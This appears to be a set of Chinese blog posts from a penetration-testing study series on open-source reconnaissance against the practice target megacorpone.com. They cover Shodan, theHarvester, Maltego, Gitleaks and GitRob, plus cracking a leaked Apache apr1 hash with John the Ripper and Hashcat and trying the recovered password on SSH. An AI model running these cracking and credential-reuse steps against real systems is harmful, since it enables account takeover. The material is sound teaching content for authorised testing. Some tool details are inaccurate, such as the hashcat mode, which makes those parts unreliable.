带宽控制：使用--rate参数避免网络瘫痪
结果验证：Masscan结果需用Nmap二次验证
持久扫描：大型网络使用--resume保存进度
更新数据库：定期apt update && apt upgrade masscan获取最新指纹库

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day17 Kali开源信息收集

Fri, 30 May 2025 14:54:26 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

上一篇文章中，我们用google语法搜索了Github上的该公司的员工信息

1site:github.com "megacorpone.com"

找到网页 https://github.com/megacorpone

找到文件megacorpone/xampp.users 发现疑似密码字段

1trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

密码破解与爆破

🔍 一、哈希结构分析

加密字符串格式为： trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

$apr1$ ：标识 Apache 特定的 MD5 算法变种（加盐迭代）
A0vSKwao：8字符盐值（Salt）
GV3sgGAj...：实际哈希值

⚙️ 二、Kali 破解方法

方法 1：John the Ripper（推荐）

步骤：

创建哈希文件hash.txt，内容为：

1trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0

启动破解（自动识别apr1格式）：

1john --format=md5crypt-long hash.txt
2# 或显式指定格式
3john --format=apr1 hash.txt

使用字典加速（如 Kali 内置rockyou.txt）：

1john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

查看结果：

1john --show hash.txt
2# 输出示例：trivera:password123

爆破得到密码trivera:Tanya4life可能是ssh登录的。

方法 2：Hashcat（GPU 加速）

提取哈希部分（移除用户名和盐标识）：

1echo '$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0' > hash.txt

启动破解（-m 1600对应apr1模式）：

1hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

查看结果：
```
1hashcat --show -m 1600 hash.txt
```

⚡ 三、性能优化技巧

字典选择：
- 优先使用rockyou.txt（需解压）：
```
1sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
```
- 自定义字典：结合目标信息生成（如公司名、日期等）

规则扩展：在 Hashcat 中使用规则增强字典覆盖：

1hashcat -m 1600 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule

暴力破解（最后手段）：

1# 尝试 6-8 位小写字母+数字
2hashcat -m 1600 -a 3 hash.txt ?l?l?l?l?l?l?d?d --increment

⚠️ 四、注意事项

合法性：仅限破解自有或授权数据！
成功率：
- 简单密码（如password123）可能在几分钟内破解
- 复杂密码（12位+特殊字符）需数天甚至不可行
算法特性：
- apr1基于 MD5，但迭代 1000 次增加破解难度
- 盐值（A0vSKwao）防止彩虹表攻击

💡 提示：若以上方法失败，可尝试组合工具（如先用 John 初步筛选，再用 Hashcat GPU 深度破解）。

📚 附：相关命令速查

操作	John the Ripper	Hashcat
基础破解	`john hash.txt`	`hashcat -m 1600 hash.txt dict`
指定字典	`john --wordlist=dict.txt hash.txt`	`hashcat -a 0 hash.txt dict`
显示结果	`john --show hash.txt`	`hashcat --show -m 1600 hash.txt`

建议优先使用 John the Ripper 进行快速尝试，复杂场景切换 Hashcat + GPU 加速。

Gitleaks和GitRob使用方法

一、GitLeaks：敏感信息检测工具

核心功能

扫描 Git 仓库中的硬编码密码、API 密钥、令牌等敏感信息，支持本地仓库、远程仓库及 CI/CD 集成。

安装方法

Kali安装
```
1sudo apt install gitleaks
```

Docker 部署：

1# 拉取镜像
2docker pull ghcr.io/gitleaks/gitleaks:latest
3# 扫描本地目录（将 /path/to/code 替换为代码路径）
4docker run -v /path/to/code:/scan_dir ghcr.io/gitleaks/gitleaks detect --source "/scan_dir"

Homebrew：

1brew install gitleaks
2gitleaks detect --source .

GitHub Action 集成：在 CI 流程中添加以下步骤：

1- name: GitLeaks Scan
2 uses: gitleaks/gitleaks-action@v2
3 env:
4 GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

关键命令

功能	命令
扫描目录	`gitleaks detect --source /path/to/dir`
生成 JSON 报告	`gitleaks detect --report-path report.json`
自定义规则文件	`gitleaks detect --config gitleaks.toml`

 1Gitleaks scans code, past or present, for secrets
 2
 3Usage:
 4 gitleaks [command]
 5
 6Available Commands:
 7 completion Generate the autocompletion script for the specified shell
 8 detect detect secrets in code
 9 help Help about any command
10 protect protect secrets in code
11 version display gitleaks version
12
13Flags:
14 -b, --baseline-path string path to baseline with issues that can be ignored
15 -c, --config string config file path
16 order of precedence:
17 1. --config/-c
18 2. env var GITLEAKS_CONFIG
19 3. (--source/-s)/.gitleaks.toml
20 If none of the three options are used, then gitleaks will use the default config
21 --exit-code int exit code when leaks have been encountered (default 1)
22 -h, --help help for gitleaks
23 -l, --log-level string log level (trace, debug, info, warn, error, fatal) (default "info")
24 --max-target-megabytes int files larger than this will be skipped
25 --no-banner suppress banner
26 --redact redact secrets from logs and stdout
27 -f, --report-format string output format (json, csv, sarif) (default "json")
28 -r, --report-path string report file
29 -s, --source string path to source (default: $PWD) (default ".")
30 -v, --verbose show verbose output from scan
31
32Use "gitleaks [command] --help" for more information about a command.

以下是 Gitleaks 帮助文档的完整翻译及整理结果，附带常用示例用法：

Gitleaks 文档翻译

功能：扫描代码（历史或当前）中的敏感密钥（如 API Key、密码等） 命令格式：

gitleaks [command]

可用命令（Available Commands）

命令	说明
`completion`	为指定 shell 生成自动补全脚本（如 bash/zsh）
`detect`	核心功能：检测代码中的敏感密钥
`help`	查看命令帮助
`protect`	在提交时实时拦截密钥（通常用于 Git Hook）
`version`	显示 Gitleaks 版本

全局参数（Flags）

参数	说明
`-b, --baseline-path <路径>`	指定基准文件路径（忽略已记录的漏洞）
`-c, --config <路径>`	配置文件路径（优先级顺序：1. 本参数 > 2. 环境变量 `GITLEAKS_CONFIG` > 3. 代码目录下的 `.gitleaks.toml` > 4. 默认配置）
`--exit-code <整数>`	检测到密钥时的退出码（默认值 `1`，常用于 CI/CD 流程）
`-h, --help`	显示帮助信息
`-l, --log-level <级别>`	日志级别（trace/debug/info/warn/error/fatal，默认 `info`）
`--max-target-megabytes <MB>`	跳过超过指定大小的文件（单位：MB）
`--no-banner`	关闭横幅提示
`--redact`	安全：在输出中隐藏密钥内容（替换为 `***`）
`-f, --report-format <格式>`	报告格式（json/csv/sarif，默认 `json`）
`-r, --report-path <路径>`	报告输出路径
`-s, --source <路径>`	扫描的代码目录（默认：当前目录 `.`）
`-v, --verbose`	显示详细扫描日志

使用 gitleaks [command] --help 查看具体命令帮助（如 gitleaks detect --help）

典型用法示例

1. 基础扫描（当前目录）

gitleaks detect

扫描当前目录所有文件（包括 Git 历史记录）
检测到密钥时程序退出码为 1（可通过 $? 判断结果）

2. 扫描指定目录 + 生成报告

gitleaks detect \
 --source ~/projects/myapp \ # 指定目录
 --report-format json \ # 报告格式
 --report-path leaks.json # 输出文件

3. 安全扫描（隐藏密钥内容）

gitleaks detect --redact -v

输出日志中的密钥将被替换为 ***
-v 显示详细扫描过程

4. 与 CI/CD 集成（GitLab 示例）

stages:
 - security

gitleaks_scan:
 stage: security
 image: zricethezav/gitleaks:latest
 script:
 - gitleaks detect --exit-code 1

在 CI 流水线中检测到密钥立即失败（exit-code 1）

5. 使用自定义配置

gitleaks detect \
 --config custom.toml \ # 自定义规则文件
 --baseline-path baseline.json # 忽略已知问题

custom.toml：定义特定密钥规则（如公司内部密钥格式）
baseline.json：忽略历史已处理的漏洞

注意事项

敏感操作：
- 使用 --redact 避免密钥在日志中泄露。
性能优化：
- 用 --max-target-megabytes 10 跳过大型文件（如二进制文件）。
Git 集成：
- protect 命令可配置为 pre-commit 钩子（实时拦截提交中的密钥）。
配置优先级：
- 灵活使用 -c 参数覆盖默认规则，避免漏报。

通过 gitleaks detect --help 查看所有参数说明，或访问官方文档获取完整配置示例。

使用 GitLeaks 扫描 GitHub 仓库的完整步骤

1. 克隆目标仓库

git clone --depth 1 https://github.com/megacorpone/megacorpone.com.git
cd megacorpone.com.git

2. 执行 GitLeaks 扫描

gitleaks detect -v --redact

detect：扫描模式
-v：详细输出（显示所有检测结果）
--redact：自动屏蔽敏感信息（防止二次泄露）

3. 生成报告（可选）

gitleaks detect --report-format json --report-path leaks_report.json

生成 JSON 格式报告，便于后续分析
其他格式支持：csv, sarif, html

高级用法

1. 仅扫描最新提交

gitleaks detect --log-opts -1

2. 指定扫描范围

# 扫描最近 10 个提交
gitleaks detect --log-opts -10

# 扫描特定分支
gitleaks detect --branch develop

3. 自定义规则

创建规则文件 custom.toml：

title = "Custom Rules"

[[rules]]
description = "MegaCorp API Key Detector"
regex = '''(?:mc)(?:[0-9a-z\-_\t .]{0,20})(?:[0-9a-f]{32})'''
tags = ["key", "megacorp"]

使用自定义规则扫描：
```
gitleaks detect --config custom.toml
```

4. Docker 方式扫描（无需克隆）

docker run -v $(pwd):/path ghcr.io/gitleaks/gitleaks:latest detect \
 --source https://github.com/megacorpone/megacorpone.com.git \
 --report-format json \
 --report-path /path/leaks.json

结果解读示例

Finding: AWS Access Key
Secret: AKIAIOSFODNN7EXAMPLE
RuleID: aws-access-token
File: src/config.py:15
Commit: d0d1c3c4d5b6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
Author: dev@megacorpone.com
Date: 2025-01-15T08:00:00Z

高危项：AWS密钥、数据库凭证、API密钥
中危项：内部邮箱、服务器地址
低危项：测试凭据、占位符

注意事项

法律合规：
- 仅扫描授权仓库
- 避免公开泄露扫描结果

误报处理：

使用 --baseline-path 忽略已知误报

gitleaks detect --baseline-path previous_report.json

性能优化：
- 大仓库添加 --max-target-megabytes=50 限制文件大小
- 使用 --no-git 跳过Git历史扫描（仅当前文件）
敏感信息保护：
- 始终使用 --redact 或 --exit-code（CI/CD场景）
```
gitleaks detect --exit-code 1 # 发现泄露时返回非0状态码
```

扫描完成后，立即检查并修复所有发现的敏感信息泄露！

🕵️ 二、GitRob：GitHub 仓库敏感文件扫描

核心功能

自动化扫描 GitHub 用户/组织的公开仓库，检测配置文件、密钥文件等高危文件（如 .env、id_rsa）。

安装与使用

安装（需 Go 环境）：

1sudo apt install golang-go
2go get github.com/michenriksen/gitrob

启动扫描：

1# 使用 GitHub Token 扫描目标用户（替换 <token> 和 <username>）
2gitrob -t <github_token> <username>

注：Token 需在 GitHub Settings → Developer Settings 生成，权限勾选 repo 和 user。

输出解读

结果按文件类型分类（如 Database、SSH Keys）。
显示文件路径、仓库 URL 及风险等级。

⚖️ 三、工具对比与联合使用建议

特性	GitLeaks	GitRob
扫描目标	代码内容（敏感字符串）	仓库文件结构（高危文件名）
适用场景	本地/远程仓库深度内容检测	GitHub 公开仓库快速筛查
输出形式	JSON/命令行报告	命令行表格
联合策略	先用 GitRob 定位可疑仓库，再用 GitLeaks 深度扫描

⚠️ 四、注意事项

法律合规：仅扫描授权目标，禁止未授权探测他人仓库。
误报处理：GitLeaks 支持自定义规则（修改 gitleaks.toml过滤误报）。
性能优化：大仓库扫描可能超时，建议通过--max-target-megabytes限制文件大小。

💎 五、实战流程示例

graph LR
A[GitRob 扫描目标用户仓库] --> B{发现高危文件}
B -->|存在 .env 等| C[GitLeaks 深度扫描该仓库]
B -->|无风险| D[结束]
C --> E[生成泄露报告]

Shodan网络空间搜索引擎

Shodan 是一个专注于物联网设备和网络服务的搜索引擎，可用于安全研究、漏洞发现和资产监控。以下是详细的使用方法：

一、网页端使用（Shodan.io）

注册账户
- 访问 Shodan官网，网址：https://www.shodan.io/dashboard 注册免费账户（免费账户功能有限，付费账户支持高级搜索）。
基础搜索命令
- 关键词搜索：直接输入设备类型（如 webcam）、服务（如 ftp）或厂商（如 cisco）。
- 过滤器（组合使用更精准）：
  - port:：指定端口（例：port:22）
  - country:：国家代码（例：country:CN）
  - city:：城市（例：city:beijing）
  - org:：组织/运营商（例：org:"China Telecom"）
  - os:：操作系统（例：os:"Windows Server"）
  - vuln:：CVE漏洞（例：vuln:CVE-2024-1234）
- 组合示例：
```
apache country:US port:80 
```

用如下命令搜索该网站的22端口，因为我们刚刚破解了一个疑似是ssh登录的密码trivera:Tanya4life

1hostname:megacorpone.com port:"22"

找到4个结果，最终测试发现149.56.244.87可以登录ssh，但是密码似乎不对。

高级功能
- 地图视图：搜索结果以地理分布展示。
- 漏洞筛选：点击 “Exploits” 标签查看相关漏洞。
- 资产监控（付费功能）：监控特定IP或网络的安全状态。

二、Kali Linux 命令行工具（`shodan`）

安装与配置

安装工具：

sudo apt update && sudo apt install -y shodan # Kali官方源安装

或使用Python pip：

pip install shodan

初始化API密钥：
- 登录 Shodan 官网，在个人资料中获取 API Key。
- 在终端配置：
```
shodan init YOUR_API_KEY
```

常用命令

命令	功能	示例
`shodan count <query>`	统计匹配结果数量	`shodan count apache`
`shodan search <query>`	搜索并显示结果（默认20条）	`shodan search "nginx country:CN"`
`shodan download <文件名> <query>`	下载原始数据（JSON格式）	`shodan download results "port:21"`
`shodan parse <文件名>`	解析下载的数据	`shodan parse results.json.gz`
`shodan host <IP>`	查询指定IP的详细信息	`shodan host 8.8.8.8`
`shodan scan list`	列出主动扫描任务（需付费）	`shodan scan list`

实用示例

搜索暴露的 Redis 服务：
```
shodan search "product:redis"
```
统计中国区暴露的 SSH 服务：
```
shodan count "port:22 country:CN"
```

下载所有暴露的 MongoDB 数据并解析：

shodan download mongo_data "port:27017"
shodan parse mongo_data.json.gz

优化显示

1 shodan parse --fields "ip_str,port,org" megacorpone.json.gz 
2 shodan parse --fields "ip_str,port,org,hostnames,domains,isp,product,version,os,location.country_name,location.city,location.latitude,location.longitude" megacorpone.json.gz 
3 shodan parse --fields "ip_str,port" --separator "," > megacorpone.csv

Shodan 的 --fields 参数支持丰富的字段选项，这些字段对应 Shodan 扫描结果中的 JSON 属性。以下是常用字段分类及示例：

核心字段

字段	说明
`ip_str`	IP 地址 (字符串格式)
`port`	端口号
`org`	组织/ISP (如 “Google LLC”)
`hostnames`	关联的主机名列表
`domains`	关联的域名列表
`asn`	自治系统号 (如 “AS15169”)
`isp`	网络服务提供商
`transport`	协议类型 (tcp/udp)
`product`	检测到的产品 (如 “nginx”)
`version`	产品版本
`os`	操作系统信息

地理位置字段

字段	说明
`location.country_code`	国家代码 (如 “US”)
`location.country_name`	国家全名 (如 “United States”)
`location.city`	城市名
`location.region_code`	地区/州代码 (如 “CA”)
`location.postal_code`	邮政编码
`location.latitude`	纬度
`location.longitude`	经度

HTTP 服务字段

字段	说明
`http.title`	网页标题
`http.server`	HTTP 服务器头
`http.headers`	完整 HTTP 头信息
`http.robots`	robots.txt 内容
`http.sitemap`	站点地图链接
`http.security.txt`	security.txt 内容

SSL/TLS 证书字段

字段	说明
`ssl.cert.subject`	证书主题
`ssl.cert.issuer`	证书颁发机构
`ssl.cert.expired`	是否过期 (true/false)
`ssl.cert.validity.start`	证书有效期开始
`ssl.cert.validity.end`	证书有效期结束
`ssl.cipher.version`	SSL/TLS 版本
`ssl.jarm`	JARM 指纹

漏洞与安全字段

字段	说明
`vulns`	漏洞列表 (CVE IDs)
`opts.vulns`	漏洞详情 (需企业权限)
`cpe`	CPE 标识符列表
`shodan.ptr`	PTR 记录

特殊字段

字段	说明
`banner`	原始 banner 信息
`data`	完整响应数据
`timestamp`	扫描时间戳 (ISO 格式)
`_shodan.id`	Shodan 扫描 ID
`_shodan.module`	使用的扫描模块

使用技巧

嵌套字段访问：使用点号访问嵌套属性

shodan parse --fields "ip_str,port,location.country_code" data.json.gz

查看所有字段：提取一条完整记录检查可用字段
```
shodan parse data.json.gz | head -n 1
```

组合关键字段：常用组合示例

# IP + 端口 + 国家 + 组织 + 产品
shodan parse --fields "ip_str,port,location.country_code,org,product" data.json.gz

💡 提示：字段可用性取决于扫描类型和服务类型（HTTP/SSH/FTP 等）。使用 shodan host <IP> 命令可查看某 IP 的完整字段结构。

Security Headers Scanner 安全标题扫描器

网址：https://securityheaders.com/

SSL Server SSL服务测试

网址：https://www.ssllabs.com/ssltest/analyze.html

https://www.ssllabs.com/ssltest/

Pastebin存储和共享文本的网站。

网址：https://pastebin.com/

stack overflow国外代码问答网站

网址：https://stackoverflow.com/questions

theharvester 用户信息收集

theHarvester 是一款强大的开源情报（OSINT）收集工具，用于从公开来源挖掘目标信息（如域名、邮箱、IP、子域名等）。以下是其核心用法详解：

基础语法

theHarvester -d <domain> [选项]

-d / --domain：目标域名（必需参数）示例：theHarvester -d example.com

核心功能选项

1. 指定数据源（关键选项）

-b, --source <数据源> # 指定搜索源（默认：baidu,bing,duckduckgo,google）

常用数据源：

google：Google 搜索
bing：Bing 搜索
linkedin：LinkedIn 员工信息
twitter：Twitter 相关账号
shodan：Shodan IP/服务扫描
dnsdumpster：DNS 子域名挖掘
certspotter：SSL 证书信息
github：GitHub 代码泄露
完整列表：all（使用全部可用源）

示例：

# 使用 Google 和 DNSdumpster 搜索
theHarvester -d example.com -b google,dnsdumpster

# 使用全部数据源
theHarvester -d example.com -b all

2. 限制结果数量

-l, --limit <数量> # 限制每个数据源返回结果数（默认：500）

示例：theHarvester -d example.com -l 100

3. 主动扫描扩展

-s, --scrape # 抓取网站提取额外邮箱（可能触发反爬）
-v, --virtual-host # 验证虚拟主机（检查IP是否托管多域名）
-n, --dns-lookup # 对发现的域名执行DNS解析
-c, --shodan # 使用Shodan API扫描发现的IP（需API密钥）

示例：

theHarvester -d example.com -b all -s -n -c

4. 输出控制

-f, --filename <文件> # 结果保存到文件（默认：results/<domain>.html/.xml）
--filename # 仅控制文件名前缀（自动追加格式后缀）

示例：

# 保存为JSON格式
theHarvester -d example.com -f results.json -b google

高级用法

1. 代理配置（绕过封锁）

--proxy # 使用代理（需在配置文件中设置代理服务器）

配置文件路径：/etc/theHarvester/proxies.yaml

2. API密钥配置

部分数据源（如Shodan、GitHub）需API密钥：

编辑配置文件：/etc/theHarvester/api-keys.yaml

添加密钥（示例）：

shodan: YOUR_SHODAN_API_KEY
github: YOUR_GITHUB_TOKEN

3. 组合实战示例

目标：全面收集企业信息并验证服务

theHarvester -d example.com \
 -b google,dnsdumpster,linkedin,shodan \ # 指定核心数据源
 -l 200 \ # 限制结果量
 -s -n -v -c \ # 启用主动验证
 -f full_report # 输出到文件

输出结果解读

工具输出包含以下关键信息：

Hosts (IP地址)：发现的服务器IP
Emails：关联邮箱（含来源）
Subdomains：子域名列表
Virtual Hosts：共享IP的域名
Shodan Data：开放端口/服务详情（需-c）
关联人员（LinkedIn/Twitter来源）

注意事项

法律合规：仅用于授权测试，避免滥用
速率限制：搜索引擎会封禁高频请求，建议：
- 限制结果数（-l 100）
- 使用代理（--proxy）
- 避免频繁执行
API密钥：Shodan/GitHub等源需配置密钥才能生效

💡 提示：使用 theHarvester -h 查看完整帮助文档，获取最新数据源列表和选项说明。

练习题

使用TheHarvester枚举megacorpone.com的电子邮件地址。

1theHarvester -d megacorpone.com -b bing
2emailharvester -d megacorpone.com
3proxychains emailharvester -d megacorpone.com # 带代理查找

网址：https://www.social-searcher.com/

基于特定网站的搜索工具

Twiter https://digi.ninja/projects/twofi.php

LinkedIn https://github.com/initstring/linkedin2username

可以自行再github上搜索相关工具。

OSINT Framework 开源情报框架

网址：https://osintframework.com/

介绍了一些国外常用的收集信息的工具和网站，基于该框架搜索和收集信息

Maltego

网址：http://www.paterva.com/buy/maltego-clients.php

安装后免费注册一个账号即可使用

Maltego 是一款强大的开源情报（OSINT）和网络关系可视化工具，用于信息收集、关联分析和数据取证。以下是详细使用指南：

一、核心概念

实体（Entities）
- 基本数据单元（如 Domain, IP, Person, Email, Phone 等）
- 右键可执行操作（Transforms）
变换（Transforms）
- 对实体执行的操作（如查找关联域名、邮箱、IP等）
图谱（Graph）
- 可视化展示实体间的关系网络

二、基础工作流程

步骤1：创建新项目

启动 Maltego → New → Graph
命名项目（如 megacorp_investigation）

步骤2：添加起始实体

左侧面板选择实体类型（如 Domain）
拖拽到工作区 → 双击输入目标（如 megacorpone.com）
```
graph LR
A[Domain: megacorpone.com] --> B[Run Transforms]
```

步骤3：执行变换（Transforms）

右键实体 →
```
Run Transform
```
→ 选择模块
- 常用变换：
  - To DNS from domain（解析DNS记录）
  - To Website from Domain（查找网站）
  - To Email addresses（挖掘邮箱）
  - To IP addresses（解析IP）

步骤4：扩展分析

对新生成的实体重复步骤3

示例路径：

Domain → IP → Netblock → Other domains
 ↓
 Email → Person → Social profiles

三、实战案例：调查公司资产

目标：挖掘 megacorpone.com 相关资产和人员

起始点：添加 Domain 实体 → megacorpone.com

执行变换：

graph TB
A[Domain] --> B[To DNS names]
A --> C[To IP addresses]
A --> D[To Email addresses]
B --> E[Subdomains]
C --> F[Server IPs]
D --> G[Employee emails]

深度挖掘：
- 对IP运行 To Netblock → 发现同网段其他服务器
- 对邮箱运行 To Person → 关联LinkedIn资料
- 对人员运行 To Social Networks → 发现社交媒体账号

四、高级技巧

1. 自定义变换组合

创建
```
Machines
```
（自动化工作流）：
- Machines → Create new Machine
- 拖拽实体和变换构建流程
- 示例：自动完成 Domain → IP → Port Scan → Services

2. 数据源集成

安装Transform Hub模块：
- Shodan（IP扫描）
- Hunter.io（邮箱挖掘）
- VirusTotal（威胁情报）
配置API密钥：Transforms → Transform Hub → 激活服务

3. 可视化优化

颜色标记：右键实体 → Change Color（如红色标记高危IP）
关系线调整：拖动连线调整路径
布局优化：Layout → Organic / Hierarchical

4. 数据导出

导出图谱：Export → PNG/PDF/SVG
导出数据：Export → CSV/GraphML
生成报告：Reporting → Create Report

五、常用变换模块

变换名称	功能	适用实体
`To DNS from domain`	解析子域名	Domain
`To IP Address [DNS]`	解析IP地址	Domain
`To Website [Domain]`	发现关联网站	Domain
`To Email addresses [Domain]`	挖掘邮箱	Domain
`To Netblock [IP]`	查找IP所属网段	IP
`To Domain [SSL Cert]`	通过SSL证书发现域名	IP
`To Person [Email]`	关联人员信息	Email
`Shodan: Scan IP`	端口扫描	IP

六、最佳实践

分层调查：

graph LR
L1[基础设施] --> DNS/IP/Netblock
L2[人员] --> Email/Person/Social
L3[威胁] --> Vulnerabilities/Breach

保存检查点：File → Save as Snapshot
使用书签：标记关键实体（右键 → Bookmark）
避免噪音：设置过滤器（View → Filter Entities）

七、学习资源

官方教程：Help → Interactive Tutorials
案例库：Maltego Use Cases
认证课程：Maltego Certified Examiner (MCE)

⚠️ 注意：

遵守法律和道德规范，仅用于授权测试

社区版功能有限，企业版支持更多数据源

敏感操作（如端口扫描）可能触发安全警报

通过 Maltego 的可视化关联分析，您能将碎片信息转化为可行动的情报，极大提升渗透测试和威胁调查效率。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day16 Kali被动信息收集（开源情报）

Thu, 29 May 2025 17:45:02 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

被动信息收集（Passive Information Gathering）与主动信息收集（Active Information Gathering）的区别

在网络安全、渗透测试和威胁情报分析中，这两种信息收集方式的核心区别在于 是否直接与目标系统交互。

1. 被动信息收集

定义：通过公开资源或第三方数据源获取目标信息，不直接与目标系统或网络通信。
特点：
- 隐蔽性高：目标无法感知被探测。
- 依赖公开数据：利用搜索引擎、社交媒体、DNS记录、数据库等。
- 法律风险低：通常不违反法律（需遵守隐私政策）。
常见方法：
- 搜索引擎：Google Hacking（site:, filetype: 等语法）。
- WHOIS查询：获取域名注册信息（注册人、DNS服务器）。
- DNS解析：通过公开DNS记录获取子域名、IP地址（如 dig、nslookup）。
- 历史数据：查看网页快照（Wayback Machine）、漏洞数据库（CVE、Exploit-DB）。
- 社交媒体：LinkedIn、GitHub（员工信息、代码泄露）。
- Shodan/Censys：搜索暴露的物联网设备和服务。
适用场景：
- 渗透测试初期，确定目标范围。
- 威胁情报分析，追踪攻击者基础设施。
- 避免触发目标安全告警（如IDS/IPS）。

2. 主动信息收集

定义： 直接与目标系统或网络通信，通过发送探测请求获取信息。
特点：
- 交互性强：可能触发安全机制（如防火墙、日志记录）。
- 信息更精准：直接验证目标状态（端口开放性、服务版本）。
- 法律风险高：未经授权的主动探测可能违法（如《计算机欺诈与滥用法》）。
常见方法：
- 端口扫描：Nmap（-sS 半开扫描）、Masscan。
- 服务指纹识别：Banner抓取（Telnet、Netcat）、Nmap脚本（-sV）。
- 漏洞探测：Nessus、OpenVAS（验证已知漏洞）。
- 网络嗅探：Wireshark、tcpdump（分析流量）。
- 暴力破解：Hydra（测试弱密码）、DirBuster（目录枚举）。
- 主动DNS查询：直接向目标DNS服务器请求记录。
适用场景：
- 渗透测试中后期，验证漏洞可利用性。
- 红队行动中模拟真实攻击行为。
- 需获得明确授权（如授权渗透测试）。

对比表格

特征	被动信息收集	主动信息收集
交互性	不直接与目标交互	直接与目标交互
隐蔽性	高（目标无法察觉）	低（可能触发告警）
数据来源	公开资源、第三方数据库	目标系统的响应数据
法律风险	低（需遵守隐私政策）	高（需明确授权）
常用工具	Shodan, WHOIS, Wayback Machine, Google	Nmap, Nessus, Hydra, Wireshark
渗透测试阶段	前期（侦查）	中后期（漏洞利用、横向移动）

实战建议

优先被动收集：在未授权时仅使用被动方法，避免法律风险。例如：通过GitHub搜索目标代码泄露。
主动收集需授权：在渗透测试中，主动扫描前必须获得书面授权。例如：使用Nmap扫描客户网络。
混合使用：结合两者提高效率。例如：被动收集子域名后，主动验证其存活性和服务版本。

开源情报（OSINT，Open Source Intelligence）是指从公开可获取的来源中收集、分析和利用信息，用于支持决策或安全分析。其核心特点是数据来源完全公开（如互联网、媒体、政府记录等），无需侵入目标系统，但需通过技术手段筛选有效信息。

什么是开源情报，如何获取开源情报？

开源情报（OSINT）的核心特点

公开性：数据来自免费或公开渠道（如网页、社交媒体、数据库）。
合法性：遵守隐私政策和法律法规（如 GDPR、CCPA）。
非侵入性：不直接与目标交互，避免触发安全告警。
多样性：覆盖文本、图像、视频、元数据等多种格式。
可验证性：通过交叉比对多个来源提高信息可信度。

如何获取开源情报？

1. 基础数据来源

搜索引擎：
- Google Dorking：使用高级语法（site:example.com filetype:pdf）挖掘敏感文件。
- Bing/Yandex：特定区域或语言的内容（如俄语信息用Yandex更高效）。
社交媒体：
- LinkedIn：挖掘员工职位、技术栈（如“某公司使用Apache Tomcat”）。
- Twitter/Telegram：追踪威胁情报（如勒索软件团伙的暗网活动）。
- GitHub/GitLab：搜索代码泄露、API密钥或硬编码密码。
域名与IP：
- WHOIS查询：获取域名注册人、邮箱、电话（工具：WhoisXML API）。
- DNS记录：通过 dig 或在线工具（ViewDNS）解析子域名和MX记录。
- 证书透明度日志（如crt.sh）：发现目标关联的SSL证书和子域名。

2. 高级技术工具

网络资产测绘：
- Shodan：搜索暴露的物联网设备（如摄像头、数据库）。
- Censys：分析IP的开放端口和服务指纹（如Apache版本）。
- FOFA：国内版Shodan，侧重中文目标。
元数据提取：
- ExifTool：从图片中提取GPS坐标、拍摄设备。
- FOCA：分析文档（PDF/Word）中的隐藏元数据。
历史数据：
- Wayback Machine：查看网站历史快照（如已删除的登录页面）。
- DNS历史记录：通过SecurityTrails追溯IP变更。

3. 自动化与框架

OSINT集成工具：
- Maltego：可视化关联分析（如域名→IP→员工邮箱→社交媒体）。
- SpiderFoot：自动聚合WHOIS、DNS、漏洞库等数据。
- theHarvester：批量收集邮箱、子域名（支持Google、Bing、PGP密钥服务器）。
自定义脚本：
- 使用Python（requests、BeautifulSoup）爬取特定网站数据。
- 调用API（如Twitter API、Shodan API）实现数据批量获取。

4. 暗网与威胁情报

暗网监控：
- 使用 Tor浏览器 访问暗网论坛（如Dread），搜索数据泄露记录。
- 工具：DarkSearch.io（暗网搜索引擎）。
漏洞与威胁库：
- CVE Details：查询已知漏洞的利用方式。
- VirusTotal：分析文件哈希、URL关联的恶意活动。
- AlienVault OTX：获取全球威胁情报指标（IOC）。

实战案例

定位数据泄露来源：
- 在GitHub搜索 companyname password，发现员工误传的配置文件含数据库密码。
- 通过Shodan验证该数据库IP是否暴露在公网。
钓鱼攻击溯源：
- 从钓鱼邮件元数据中提取发信IP，用AbuseIPDB查询历史恶意行为。
- 关联该IP的SSL证书，发现注册邮箱与某暗网论坛账号一致。
供应链攻击分析：
- 通过Crunchbase找到目标供应商的客户列表。
- 使用Censys扫描这些客户的公网资产，发现共用同一脆弱SaaS服务。

注意事项

法律合规：
- 避免侵犯隐私（如爬取LinkedIn个人资料可能违反用户协议）。
- 在欧盟地区需遵守GDPR（如模糊化处理个人信息）。
道德准则：
- 仅用于授权测试或防御分析，禁止恶意用途。
信息验证：
- 交叉验证多个来源（如WHOIS邮箱是否与社交媒体账号关联）。
- 警惕虚假信息（如伪造的GitHub仓库或域名注册信息）。

总结

开源情报（OSINT）是“从公开信息中提炼黄金”的技术，核心在于：

明确目标（如“获取某公司的网络拓扑”）。
选择工具链（如Maltego关联分析 + Shodan验证）。
自动化与人工分析结合，最终形成可行动的威胁情报。

Whois 信息收集

还是官方的靶机网址 https://www.megacorpone.com/

1whois megacorpone.com

强制指定 WHOIS 服务器（某些域名需指定注册商服务器）：

1whois -h whois.verisign-grs.com megacorpone.com

WHOIS 输出信息解析

1. 关键字段解读

字段	说明
